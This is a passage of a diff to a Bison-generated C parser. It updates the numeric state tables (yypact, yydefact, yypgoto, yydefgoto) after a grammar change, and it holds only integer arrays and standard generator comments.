592, 394, -840, 158, 594, -840, 298, 595, 596, 238, ++ 394, 394, 394, 394, 394, 599, 523, -840, 338, 485, ++ 81, -840, -840, 36, -840, -840, -840, -840, 238, -840, ++ 324, -840, -840, 38, -840, -840, 238, -840, 331, -840, ++ -840, 45, -840, -840, 315, 276, 276, -840, -840, 480, ++ 606, 253, 483, -840, -1, -840, -840, 33, -840, 314, ++ -840, 400, 605, 607, 608, 609, -840, 171, 418, 418, ++ 418, 418, 418, 493, 494, 418, 495, 497, -840, 418, ++ 492, 496, 498, 1506, -840, 238, -840, 404, 238, -840, ++ 406, 84, -840, 407, -840, -840, 499, 288, 500, -840, ++ 1506, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ 502, -840, 504, -840, -840, -840, 1279, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, 93, 516, -840, 334, ++ -840, -840, 11, -840, 418, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, 515, -840, -840, 128, 100, 505, -840, ++ -840, -840, 506, -840, -840, -840, 507, -840, -840, -840, ++ -840, 508, -840, 84, -840, -840, 510, 642, 517, -840, ++ 735, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, 276, 276, 276, 276, 276, 1279, ++ 1279, 276, 573, 1279, 276, 519, -840, -840, 232, -840, ++ -840, -840, -840, -840, -840, -840, -840, 466, 573, 100, ++ 100, 100, -840, -840, 56, -840, 656, 520, -840, -840, ++ 521, 509, -840, -840, -840, -840, -840, 100, 100, 100, ++ 100, 1506, 134, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, 643, -840, 522, 358, -840, 525, 526, 360, ++ -840, -840, -840, -840, -840, 315, -840, 527, 527, 389, ++ -840, -840, 533, -840, -840, 492, 492, 492, -840, -840, ++ 535, 536, -840, -840, 561, -840, -840, 84, 293, -840, ++ 272, 100, 47, -840, -840, -840, -840, -840, -840, 561, ++ -840, -840, -840, -840, -840, 100, 673, 534, 573, 335, ++ -840, -840, -840, -840, 658, 537, -840, -840, 659, -840, ++ 515, 661, 662, -840, 128, -840, 1092, 540, 541, 538, ++ -840, -840, 545, 389, -840, 1506, -840, -840, -840, 418, ++ 418, -840, 584, 552, -840, -840, -840, -840, -840, -840, ++ 519, -840, -840, -840, -840, -840, -840, 843, -840, 548, ++ -840, 584, -840, 100, 690, -840, 561, 549, 558, -840, ++ -840, -840, -840, -840, -840, 100, 100, 559, 100, 100, ++ 100, 100, 100, 100, 100, 100, 100, 100, 100, 100, ++ 644, 644, 644, 543, -840, -840, 547, -840, -840, 563, ++ 683, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, 983, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, -840, -840, ++ 519, 276, 562, -840, 362, 276, 276, 565, 564, -840, ++ -840, -840, -840, -840, -840, -840, 568, -30, -840, -840, ++ 569, -840, 564, -840, 100, -840, 584, 335, 1279, -840, ++ -840, 1279, -840, -840, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, 553, 555, 560, -840, 1336, ++ 1336, 566, 1450, 1393, 694, 156, 572, 578, -840, -840, ++ -840, 577, -840, 276, -840, -840, 84, 627, 276, -840, ++ 274, 276, -840, 564, -840, 583, 585, -840, -840, -840, ++ -840, -840, -840, -840, -840, 90, -840, 559, -840, 582, ++ 586, 587, 364, -840, 267, -840, 593, -840, -840, 589, ++ -840, 367, -840, 570, 293, 373, 570, 276, 573, 584, ++ 591, 701, 314, 712, -840, 156, -840, -840, -840, 52, ++ -840, 584, 642, -840, 84, -840, 597, -840, 519, 600, ++ 570, 584, 276, -840, -840, -840, -840, 602, -840, 564, ++ -840, -840, 1506, 700, 293, 642, 603, 276, 616, -840, ++ 276, 598, 100, 702, 700, 700, 570, -840, 611, 612, ++ 1279, -840, 100, 715, 702, 702, 615, 601, 642, 700, ++ 604, -840, 100, 706, 715, 715, 642, 1279, 700, 702, ++ 617, -840, 100, -840, 706, 706, 700, 610, 702, 715, ++ -840, -840, -840, -840, 702, 618, -840, -840, -840, -840 + }; + +-/* YYDEFACT[STATE-NAME] -- Default rule to reduce with in state +- STATE-NUM when YYTABLE doesn't specify something else to do. Zero ++/* YYDEFACT[STATE-NUM] -- Default reduction number in state STATE-NUM. ++ Performed when YYTABLE does not specify something else to do. Zero + means the default is an error. */ +-static const yytype_uint16 yydefact[] = ++static const yytype_int16 yydefact[] = + { + 4, 4, 2, 0, 1, 3, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 0, 151, 352, ++ 0, 0, 0, 0, 0, 0, 0, 0, 151, 353, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 0, 0, 574, 564, 567, 568, 572, 573, 577, 578, +- 579, 580, 581, 582, 583, 584, 585, 586, 587, 310, +- 0, 565, 0, 0, 588, 589, 0, 0, 138, 127, +- 0, 153, 0, 0, 0, 590, 0, 0, 0, 5, ++ 0, 0, 575, 565, 568, 569, 573, 574, 578, 579, ++ 580, 581, 582, 583, 584, 585, 586, 587, 588, 311, ++ 0, 566, 0, 0, 589, 590, 0, 0, 138, 127, ++ 0, 153, 0, 0, 0, 591, 0, 0, 0, 5, + 43, 19, 20, 21, 9, 42, 14, 50, 40, 41, + 46, 16, 17, 15, 44, 45, 18, 22, 23, 24, + 7, 8, 6, 11, 12, 13, 10, 25, 26, 55, + 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, +- 37, 38, 39, 52, 560, 349, 350, 51, 47, 49, +- 372, 48, 53, 54, 0, 557, 0, 0, 86, 57, ++ 37, 38, 39, 52, 561, 350, 351, 51, 47, 49, ++ 373, 48, 53, 54, 0, 558, 0, 0, 86, 57, + 0, 56, 63, 0, 62, 69, 0, 68, 75, 0, +- 74, 81, 0, 0, 306, 277, 0, 278, 280, 281, +- 298, 0, 0, 313, 271, 272, 273, 274, 275, 269, +- 276, 254, 0, 498, 143, 235, 0, 234, 241, 243, +- 0, 242, 255, 256, 257, 230, 231, 0, 222, 208, +- 232, 0, 186, 181, 0, 199, 194, 375, 369, 570, +- 311, 312, 315, 575, 563, 566, 569, 576, 348, 557, +- 0, 121, 0, 0, 133, 0, 132, 154, 0, 498, ++ 74, 81, 0, 0, 307, 278, 0, 279, 281, 282, ++ 299, 0, 0, 314, 272, 273, 274, 275, 276, 270, ++ 277, 255, 0, 499, 143, 236, 0, 235, 242, 244, ++ 0, 243, 256, 257, 258, 231, 232, 0, 223, 208, ++ 233, 0, 186, 181, 0, 199, 194, 376, 370, 571, ++ 312, 313, 316, 576, 564, 567, 570, 577, 349, 558, ++ 0, 121, 0, 0, 133, 0, 132, 154, 0, 499, + 0, 94, 0, 0, 162, 163, 0, 168, 169, 0, +- 174, 175, 0, 0, 0, 0, 498, 0, 555, 87, ++ 174, 175, 0, 0, 0, 0, 499, 0, 556, 87, + 0, 0, 0, 89, 0, 0, 59, 0, 0, 65, + 0, 0, 71, 0, 0, 77, 0, 0, 83, 80, +- 307, 305, 0, 0, 0, 300, 297, 314, 0, 562, +- 0, 104, 315, 0, 0, 0, 237, 0, 0, 245, ++ 308, 306, 0, 0, 0, 301, 298, 315, 0, 563, ++ 0, 104, 316, 0, 0, 0, 238, 0, 0, 246, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, +- 211, 0, 206, 232, 233, 207, 0, 0, 183, 0, +- 180, 0, 0, 196, 0, 193, 378, 378, 316, 498, +- 571, 555, 498, 0, 123, 0, 0, 0, 0, 135, +- 0, 0, 0, 0, 0, 156, 152, 517, 0, 498, +- 591, 0, 0, 0, 165, 0, 0, 171, 0, 0, +- 177, 0, 351, 498, 373, 517, 543, 0, 0, 0, +- 464, 463, 465, 466, 468, 469, 483, 486, 490, 0, +- 467, 470, 0, 559, 556, 553, 0, 0, 88, 0, +- 0, 58, 0, 0, 64, 0, 0, 70, 0, 0, +- 76, 0, 0, 82, 0, 0, 0, 299, 0, 304, +- 502, 0, 500, 0, 145, 0, 149, 0, 0, 0, +- 0, 236, 0, 0, 244, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 210, 0, 0, 288, 226, +- 227, 0, 224, 228, 229, 209, 0, 182, 0, 190, +- 191, 0, 188, 192, 0, 195, 0, 203, 204, 0, +- 201, 205, 383, 498, 498, 308, 552, 0, 0, 0, +- 0, 142, 0, 140, 131, 0, 129, 0, 134, 0, +- 0, 0, 0, 0, 155, 0, 315, 315, 315, 315, +- 315, 0, 0, 315, 0, 516, 518, 315, 328, 0, +- 0, 0, 374, 0, 164, 0, 0, 170, 0, 0, +- 176, 0, 561, 106, 0, 0, 0, 484, 0, 488, +- 489, 474, 473, 475, 476, 478, 479, 487, 471, 491, +- 472, 485, 477, 480, 517, 558, 441, 442, 91, 92, +- 90, 61, 60, 67, 66, 73, 72, 79, 78, 85, +- 84, 302, 303, 301, 0, 0, 499, 0, 105, 146, +- 0, 144, 315, 239, 353, 354, 240, 238, 247, 246, +- 213, 214, 215, 216, 217, 218, 219, 220, 221, 212, +- 0, 282, 289, 0, 0, 0, 225, 185, 184, 0, +- 189, 198, 197, 0, 202, 384, 385, 386, 379, 380, +- 0, 376, 370, 0, 295, 0, 125, 0, 372, 122, +- 139, 141, 128, 130, 137, 136, 159, 160, 161, 158, +- 157, 498, 498, 498, 498, 498, 517, 517, 498, 492, +- 0, 498, 346, 528, 95, 0, 93, 592, 167, 166, +- 173, 172, 179, 178, 0, 492, 0, 0, 0, 547, +- 548, 0, 545, 248, 0, 481, 482, 0, 230, 506, +- 507, 504, 503, 501, 0, 0, 0, 0, 0, 0, +- 109, 119, 111, 112, 113, 117, 114, 118, 147, 0, +- 150, 0, 0, 284, 0, 0, 0, 291, 287, 223, +- 187, 200, 383, 382, 387, 387, 317, 296, 367, 0, +- 124, 126, 328, 328, 328, 523, 524, 0, 0, 527, +- 493, 494, 519, 554, 0, 329, 330, 338, 0, 0, +- 97, 101, 99, 100, 102, 107, 494, 549, 550, 551, +- 544, 546, 0, 250, 0, 492, 232, 270, 266, 115, +- 116, 0, 0, 110, 148, 0, 283, 0, 0, 0, +- 290, 0, 381, 389, 0, 0, 326, 321, 322, 0, +- 318, 319, 0, 520, 521, 522, 315, 315, 495, 593, +- 0, 332, 333, 334, 335, 336, 337, 346, 339, 341, +- 342, 343, 344, 340, 0, 103, 0, 98, 593, 249, +- 0, 252, 460, 494, 0, 0, 108, 286, 285, 293, +- 294, 292, 0, 0, 352, 0, 0, 0, 0, 0, +- 0, 0, 0, 0, 0, 0, 0, 443, 443, 443, +- 0, 529, 531, 539, 534, 449, 0, 0, 398, 394, +- 392, 393, 404, 405, 406, 407, 408, 409, 410, 411, +- 412, 413, 414, 415, 403, 416, 402, 400, 399, 395, +- 397, 396, 0, 390, 401, 418, 447, 417, 451, 541, +- 419, 533, 536, 537, 538, 377, 371, 346, 498, 0, +- 320, 0, 498, 498, 0, 496, 347, 331, 362, 359, +- 358, 363, 361, 0, 355, 360, 345, 0, 96, 496, +- 251, 0, 542, 593, 232, 517, 279, 268, 517, 258, +- 259, 260, 261, 262, 263, 264, 265, 267, 422, 421, +- 420, 444, 0, 0, 0, 426, 0, 0, 0, 0, +- 0, 0, 0, 434, 0, 388, 391, 327, 324, 309, +- 498, 525, 526, 595, 0, 498, 357, 346, 498, 253, +- 496, 505, 0, 0, 423, 424, 425, 539, 530, 532, +- 446, 540, 0, 535, 0, 450, 0, 0, 0, 0, +- 429, 0, 427, 0, 325, 323, 0, 596, 0, 497, +- 456, 365, 0, 456, 498, 492, 593, 0, 0, 0, +- 0, 428, 0, 438, 439, 440, 0, 436, 593, 295, +- 594, 0, 457, 0, 356, 346, 0, 456, 593, 498, +- 431, 432, 433, 430, 0, 437, 496, 368, 597, 0, +- 512, 366, 295, 0, 498, 453, 435, 498, 0, 0, +- 510, 512, 512, 456, 454, 0, 0, 517, 513, 0, +- 514, 510, 510, 0, 0, 295, 512, 0, 511, 0, +- 508, 514, 514, 295, 517, 512, 510, 0, 515, 0, +- 462, 508, 508, 512, 0, 510, 514, 458, 509, 459, +- 461, 510, 0, 452, 448, 120, 455 ++ 0, 211, 0, 206, 233, 234, 207, 0, 0, 183, ++ 0, 180, 0, 0, 196, 0, 193, 379, 379, 317, ++ 499, 572, 556, 499, 0, 123, 0, 0, 0, 0, ++ 135, 0, 0, 0, 0, 0, 156, 152, 518, 0, ++ 499, 592, 0, 0, 0, 165, 0, 0, 171, 0, ++ 0, 177, 0, 352, 499, 374, 518, 544, 0, 0, ++ 0, 465, 464, 466, 467, 469, 470, 484, 487, 491, ++ 0, 468, 471, 0, 560, 557, 554, 0, 0, 88, ++ 0, 0, 58, 0, 0, 64, 0, 0, 70, 0, ++ 0, 76, 0, 0, 82, 0, 0, 0, 300, 0, ++ 305, 503, 0, 501, 0, 145, 0, 149, 0, 0, ++ 0, 0, 237, 0, 0, 245, 0, 0, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 210, 0, 0, ++ 289, 227, 228, 0, 225, 229, 230, 209, 0, 182, ++ 0, 190, 191, 0, 188, 192, 0, 195, 0, 203, ++ 204, 0, 201, 205, 384, 499, 499, 309, 553, 0, ++ 0, 0, 0, 142, 0, 140, 131, 0, 129, 0, ++ 134, 0, 0, 0, 0, 0, 155, 0, 316, 316, ++ 316, 316, 316, 0, 0, 316, 0, 517, 519, 316, ++ 329, 0, 0, 0, 375, 0, 164, 0, 0, 170, ++ 0, 0, 176, 0, 562, 106, 0, 0, 0, 485, ++ 0, 489, 490, 475, 474, 476, 477, 479, 480, 488, ++ 472, 492, 473, 486, 478, 481, 518, 559, 442, 443, ++ 91, 92, 90, 61, 60, 67, 66, 73, 72, 79, ++ 78, 85, 84, 303, 304, 302, 0, 0, 500, 0, ++ 105, 146, 0, 144, 316, 240, 354, 355, 241, 239, ++ 248, 247, 213, 214, 215, 216, 217, 218, 219, 220, ++ 221, 222, 212, 0, 283, 290, 0, 0, 0, 226, ++ 185, 184, 0, 189, 198, 197, 0, 202, 385, 386, ++ 387, 380, 381, 0, 377, 371, 0, 296, 0, 125, ++ 0, 373, 122, 139, 141, 128, 130, 137, 136, 159, ++ 160, 161, 158, 157, 499, 499, 499, 499, 499, 518, ++ 518, 499, 493, 0, 499, 347, 529, 95, 0, 93, ++ 593, 167, 166, 173, 172, 179, 178, 0, 493, 0, ++ 0, 0, 548, 549, 0, 546, 249, 0, 482, 483, ++ 0, 231, 507, 508, 505, 504, 502, 0, 0, 0, ++ 0, 0, 0, 109, 119, 111, 112, 113, 117, 114, ++ 118, 147, 0, 150, 0, 0, 285, 0, 0, 0, ++ 292, 288, 224, 187, 200, 384, 383, 388, 388, 318, ++ 297, 368, 0, 124, 126, 329, 329, 329, 524, 525, ++ 0, 0, 528, 494, 495, 520, 555, 0, 330, 331, ++ 339, 0, 0, 97, 101, 99, 100, 102, 107, 495, ++ 550, 551, 552, 545, 547, 0, 251, 0, 493, 233, ++ 271, 267, 115, 116, 0, 0, 110, 148, 0, 284, ++ 0, 0, 0, 291, 0, 382, 390, 0, 0, 327, ++ 322, 323, 0, 319, 320, 0, 521, 522, 523, 316, ++ 316, 496, 594, 0, 333, 334, 335, 336, 337, 338, ++ 347, 340, 342, 343, 344, 345, 341, 0, 103, 0, ++ 98, 594, 250, 0, 253, 461, 495, 0, 0, 108, ++ 287, 286, 294, 295, 293, 0, 0, 353, 0, 0, ++ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ++ 444, 444, 444, 0, 530, 532, 540, 535, 450, 0, ++ 0, 399, 395, 393, 394, 405, 406, 407, 408, 409, ++ 410, 411, 412, 413, 414, 415, 416, 404, 417, 403, ++ 401, 400, 396, 398, 397, 0, 391, 402, 419, 448, ++ 418, 452, 542, 420, 534, 537, 538, 539, 378, 372, ++ 347, 499, 0, 321, 0, 499, 499, 0, 497, 348, ++ 332, 363, 360, 359, 364, 362, 0, 356, 361, 346, ++ 0, 96, 497, 252, 0, 543, 594, 233, 518, 280, ++ 269, 518, 259, 260, 261, 262, 263, 264, 265, 266, ++ 268, 423, 422, 421, 445, 0, 0, 0, 427, 0, ++ 0, 0, 0, 0, 0, 0, 435, 0, 389, 392, ++ 328, 325, 310, 499, 526, 527, 596, 0, 499, 358, ++ 347, 499, 254, 497, 506, 0, 0, 424, 425, 426, ++ 540, 531, 533, 447, 541, 0, 536, 0, 451, 0, ++ 0, 0, 0, 430, 0, 428, 0, 326, 324, 0, ++ 597, 0, 498, 457, 366, 0, 457, 499, 493, 594, ++ 0, 0, 0, 0, 429, 0, 439, 440, 441, 0, ++ 437, 594, 296, 595, 0, 458, 0, 357, 347, 0, ++ 457, 594, 499, 432, 433, 434, 431, 0, 438, 497, ++ 369, 598, 0, 513, 367, 296, 0, 499, 454, 436, ++ 499, 0, 0, 511, 513, 513, 457, 455, 0, 0, ++ 518, 514, 0, 515, 511, 511, 0, 0, 296, 513, ++ 0, 512, 0, 509, 515, 515, 296, 518, 513, 511, ++ 0, 516, 0, 463, 509, 509, 513, 0, 511, 515, ++ 459, 510, 460, 462, 511, 0, 453, 449, 120, 456 ++}; ++ ++/* YYPGOTO[NTERM-NUM]. */ ++static const yytype_int16 yypgoto[] = ++{ ++ -840, -840, 754, -840, -840, -408, -840, -840, -840, 434, ++ -840, -840, -840, 415, -840, -840, -840, 386, -840, -840, ++ -840, 384, -840, -840, -840, 411, -840, -840, -840, 427, ++ -622, -840, -840, -840, 91, -840, -840, -840, -840, -840, ++ 165, -840, 143, -840, -615, -840, -840, -840, -840, -840, ++ -840, 345, -840, -840, -840, 340, -840, -840, -840, 350, ++ -264, -840, -840, -840, -261, -840, -840, -840, 363, -840, ++ -840, -840, 311, -840, -840, -840, 346, -840, -840, -840, ++ 332, -840, -840, -840, 375, -840, -840, 445, -840, -840, ++ -840, 446, -840, -840, 398, -840, -840, -840, -840, 448, ++ -840, -840, 453, 17, -276, -840, -840, -840, 455, -840, ++ -840, -840, -840, 457, -840, -840, -840, -840, -840, -840, ++ -513, -840, -840, -840, -840, -840, -840, -840, -840, -595, ++ -840, -840, -840, -593, -840, -840, -840, -840, -840, -840, ++ -840, -840, -840, -840, -840, -840, -840, -840, 102, -268, ++ -840, -840, 99, -839, -840, -840, -840, 454, -840, -13, ++ -840, -510, -840, -840, -840, -225, -840, -840, 94, -840, ++ -840, -239, -790, -840, -840, -653, -840, -27, 772, 613, ++ -351, -840, -840, -578, -573, -840, -840, -561, -840, 835, ++ -216, -840, -840, 539, -840, 167, -840, 170, -840, 15, ++ -840, -840, -840, -116, -840, -840, -118, -436, -272, -840, ++ -840, -48, -840, -840, -52, -840, -840, -788, -840, 12, ++ -840, -598, -644, -837, -194, -840, 318, -840, -503, -734, ++ -735, -786, -342, -840, 243, -840, -840, -840, -366, -840, ++ -44, -840, -840, 14, -840, -840, 230, 0, -840, 556, ++ 660, -10, -205, -722, -840 + }; + + /* YYDEFGOTO[NTERM-NUM]. */ + static const yytype_int16 yydefgoto[] = + { +- -1, 1, 2, 3, 79, 80, 81, 141, 245, 246, ++ 0, 1, 2, 3, 79, 80, 81, 141, 245, 246, + 82, 144, 248, 249, 83, 147, 251, 252, 84, 150, + 254, 255, 85, 153, 257, 258, 86, 138, 242, 243, +- 87, 329, 616, 699, 700, 701, 88, 393, 89, 624, +- 538, 649, 650, 651, 90, 314, 450, 587, 91, 213, +- 455, 456, 92, 216, 318, 319, 93, 212, 452, 453, +- 94, 272, 396, 397, 95, 96, 219, 324, 325, 97, +- 224, 333, 334, 98, 227, 336, 337, 99, 230, 339, +- 340, 100, 192, 297, 298, 300, 431, 432, 101, 195, +- 302, 303, 305, 439, 440, 102, 188, 293, 289, 290, +- 292, 421, 422, 189, 295, 103, 177, 275, 276, 104, +- 105, 181, 278, 279, 713, 771, 872, 106, 107, 108, +- 109, 813, 814, 815, 816, 817, 818, 819, 820, 655, +- 822, 823, 110, 656, 111, 112, 113, 114, 115, 116, +- 117, 118, 825, 119, 120, 423, 561, 662, 663, 677, +- 564, 666, 667, 678, 121, 162, 264, 265, 122, 155, +- 156, 123, 583, 202, 268, 309, 739, 740, 741, 945, +- 848, 613, 695, 757, 764, 696, 697, 124, 125, 126, +- 546, 866, 952, 127, 128, 307, 675, 129, 235, 588, +- 131, 306, 674, 443, 578, 579, 580, 734, 832, 833, +- 834, 903, 939, 940, 942, 966, 967, 518, 892, 835, +- 898, 836, 837, 901, 838, 1005, 1014, 973, 989, 839, +- 362, 691, 749, 915, 271, 391, 392, 642, 1030, 1010, +- 1000, 1020, 474, 475, 476, 840, 896, 897, 841, 900, +- 842, 843, 899, 844, 496, 631, 632, 477, 478, 365, +- 238, 135, 331, 855, 948 +-}; +- +-/* YYPACT[STATE-NUM] -- Index in YYTABLE of the portion describing +- STATE-NUM. */ +-#define YYPACT_NINF -823 +-static const yytype_int16 yypact[] = +-{ +- -823, 143, -823, 1215, -823, -823, -1, 60, 86, 87, +- 68, 69, 119, 119, 119, 119, 71, 24, 119, 119, +- 119, 119, 119, 119, 119, 119, 1503, 8, -823, -823, +- 13, 137, 34, 119, 119, 119, 46, 322, 50, 52, +- 85, 85, -823, -823, -823, 111, -823, -823, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, 364, +- 154, 296, 217, 1503, -823, -823, 497, 270, -823, -823, +- 74, 89, 497, 85, 102, -823, 63, 65, 67, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, 140, 167, -823, -823, -823, -823, +- 311, -823, -823, -823, 94, -823, 219, 160, -823, -823, +- 207, -823, -823, 214, -823, -823, 216, -823, -823, 221, +- -823, -823, 231, 119, -823, -823, 175, -823, -823, -823, +- -823, 28, 119, 341, -823, -823, -823, -823, -823, -823, +- -823, -823, 85, 215, -823, -823, 309, -823, -823, -823, +- 243, -823, -823, -823, -823, -823, -823, 295, 242, -823, +- 276, 263, 249, -823, 285, 265, -823, -823, 45, -823, +- -823, -823, 405, -823, -823, -823, 384, -823, 167, -823, +- 75, -823, 308, 366, -823, 406, -823, -823, 259, 215, +- 336, 345, 497, 407, -823, -823, 408, -823, -823, 409, +- -823, -823, 497, 217, 1503, 479, 107, 227, 138, -823, +- 393, 394, 313, -823, 395, 320, -823, 399, 324, -823, +- 400, 326, -823, 401, 329, -823, 402, 331, -823, -823, +- -823, -823, 403, 410, 333, -823, -823, -823, 119, -823, +- 518, -823, 18, 411, 414, 337, -823, 433, 340, -823, +- 437, 439, 440, 441, 442, 443, 445, 449, 450, 342, +- -823, 332, -823, 276, -823, -823, 451, 346, -823, 306, +- -823, 452, 348, -823, 306, -823, 390, 390, -823, 215, +- -823, 138, 215, 398, 453, 527, 529, 455, 350, -823, +- 457, 462, 463, 464, 352, -823, -823, 1276, 85, 215, +- -823, -22, 465, 354, -823, 466, 356, -823, 467, 358, +- -823, 29, -823, 215, -823, 1276, 469, 470, 108, 471, +- 472, 473, 474, 475, 480, 481, -823, -40, 185, 468, +- 482, 483, 456, 544, -823, -823, 287, 534, -823, 160, +- 606, -823, 207, 607, -823, 214, 608, -823, 216, 611, +- -823, 221, 612, -823, 231, 613, 542, -823, 28, -823, +- 495, -21, -823, 496, 491, 620, 560, 503, 499, 625, +- 397, -823, 309, 626, -823, 243, 627, 628, 322, 397, +- 397, 397, 397, 631, 555, -823, 295, 516, 90, -823, +- -823, 38, -823, -823, -823, -823, 322, -823, 263, -823, +- -823, 25, -823, -823, 322, -823, 285, -823, -823, 35, +- -823, -823, 359, 215, 215, -823, -823, 511, 636, 842, +- 513, -823, 21, -823, -823, 31, -823, 287, -823, 406, +- 638, 639, 642, 643, -823, 259, 405, 405, 405, 405, +- 405, 520, 528, 405, 531, 532, -823, 405, 526, 535, +- 533, 497, -823, 322, -823, 407, 322, -823, 408, 85, +- -823, 409, -823, -823, 537, 330, 524, -823, 497, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, 536, -823, +- 538, -823, -823, -823, 1276, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, 103, 518, -823, 283, -823, -823, +- 22, -823, 405, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- 546, -823, -823, 171, 119, 539, -823, -823, -823, 545, +- -823, -823, -823, 547, -823, -823, -823, -823, 540, -823, +- 85, -823, -823, 548, 680, 543, -823, 203, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, 215, 215, 215, 215, 215, 1276, 1276, 215, 599, +- 1276, 215, 554, -823, -823, 152, -823, -823, -823, -823, +- -823, -823, -823, -823, 496, 599, 119, 119, 119, -823, +- -823, 59, -823, 683, 556, -823, -823, 557, 549, -823, +- -823, -823, -823, -823, 119, 119, 119, 119, 497, 61, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, 673, +- -823, 553, 362, -823, 558, 559, 365, -823, -823, -823, +- -823, -823, 359, -823, 561, 561, 404, -823, -823, 564, +- -823, -823, 526, 526, 526, -823, -823, 566, 568, -823, +- -823, 585, -823, -823, 85, 294, -823, 258, 119, 57, +- -823, -823, -823, -823, -823, -823, 585, -823, -823, -823, +- -823, -823, 119, 694, 567, 599, 276, -823, -823, -823, +- -823, 688, 569, -823, -823, 690, -823, 546, 692, 693, +- -823, 171, -823, 1089, 572, 573, 577, -823, -823, 578, +- 404, -823, 497, -823, -823, -823, 405, 405, -823, 604, +- 581, -823, -823, -823, -823, -823, -823, 554, -823, -823, +- -823, -823, -823, -823, 732, -823, 580, -823, 604, -823, +- 119, 717, -823, 585, 579, 588, -823, -823, -823, -823, +- -823, -823, 119, 119, 589, 119, 119, 119, 119, 119, +- 119, 119, 119, 119, 119, 119, 119, 672, 672, 672, +- 575, -823, -823, 582, -823, -823, 593, 712, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, 980, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, -823, -823, -823, -823, -823, 554, 215, 591, +- -823, 367, 215, 215, 595, 596, -823, -823, -823, -823, +- -823, -823, -823, 598, -31, -823, -823, 600, -823, 596, +- -823, 119, -823, 604, 276, 1276, -823, -823, 1276, -823, +- -823, -823, -823, -823, -823, -823, -823, -823, -823, -823, +- -823, -823, 584, 587, 592, -823, 1333, 1333, 594, 1447, +- 1390, 716, 235, 602, 610, -823, -823, -823, 609, -823, +- 215, -823, -823, 85, 657, 215, -823, 298, 215, -823, +- 596, -823, 614, 618, -823, -823, -823, -823, -823, -823, +- -823, -823, 121, -823, 589, -823, 630, 632, 633, 372, +- -823, 306, -823, 637, -823, -823, 634, -823, 376, -823, +- 616, 294, 379, 616, 215, 599, 604, 641, 731, 287, +- 755, -823, 235, -823, -823, -823, 42, -823, 604, 680, +- -823, 85, -823, 640, -823, 554, 645, 616, 604, 215, +- -823, -823, -823, -823, 646, -823, 596, -823, -823, 497, +- 742, 294, 680, 664, 215, 624, -823, 215, 644, 119, +- 747, 742, 742, 616, -823, 665, 669, 1276, -823, 119, +- 763, 747, 747, 670, 649, 680, 742, 676, -823, 119, +- 783, 763, 763, 680, 1276, 742, 747, 660, -823, 119, +- -823, 783, 783, 742, 681, 747, 763, -823, -823, -823, +- -823, 747, 662, -823, -823, -823, -823 ++ 87, 330, 619, 702, 703, 704, 88, 394, 89, 627, ++ 540, 652, 653, 654, 90, 315, 452, 590, 91, 213, ++ 457, 458, 92, 216, 319, 320, 93, 212, 454, 455, ++ 94, 272, 397, 398, 95, 96, 219, 325, 326, 97, ++ 224, 334, 335, 98, 227, 337, 338, 99, 230, 340, ++ 341, 100, 192, 298, 299, 301, 433, 434, 101, 195, ++ 303, 304, 306, 441, 442, 102, 188, 294, 290, 291, ++ 293, 423, 424, 189, 296, 103, 177, 275, 276, 104, ++ 105, 181, 278, 279, 716, 774, 875, 106, 107, 108, ++ 109, 816, 817, 818, 819, 820, 821, 822, 823, 658, ++ 825, 826, 110, 659, 111, 112, 113, 114, 115, 116, ++ 117, 118, 828, 119, 120, 425, 564, 665, 666, 680, ++ 567, 669, 670, 681, 121, 162, 264, 265, 122, 155, ++ 156, 123, 586, 202, 268, 310, 742, 743, 744, 948, ++ 851, 616, 698, 760, 767, 699, 700, 124, 125, 126, ++ 548, 869, 955, 127, 128, 308, 678, 129, 235, 591, ++ 131, 307, 677, 445, 581, 582, 583, 737, 835, 836, ++ 837, 906, 942, 943, 945, 969, 970, 520, 895, 838, ++ 901, 839, 840, 904, 841, 1008, 1017, 976, 992, 842, ++ 363, 694, 752, 918, 271, 392, 393, 645, 1033, 1013, ++ 1003, 1023, 476, 477, 478, 843, 899, 900, 844, 903, ++ 845, 846, 902, 847, 498, 634, 635, 479, 480, 366, ++ 238, 135, 332, 858, 951 + }; + +-/* YYPGOTO[NTERM-NUM]. */ +-static const yytype_int16 yypgoto[] = +-{ +- -823, -823, 834, -823, -823, -411, -823, -823, -823, 484, +- -823, -823, -823, 461, -823, -823, -823, 476, -823, -823, +- -823, 460, -823, -823, -823, 458, -823, -823, -823, 477, +- -638, -823, -823, -823, 144, -823, -823, -823, -823, -823, +- 220, -823, 196, -823, -629, -823, -823, -823, -823, -823, +- -823, 396, -823, -823, -823, 412, -823, -823, -823, 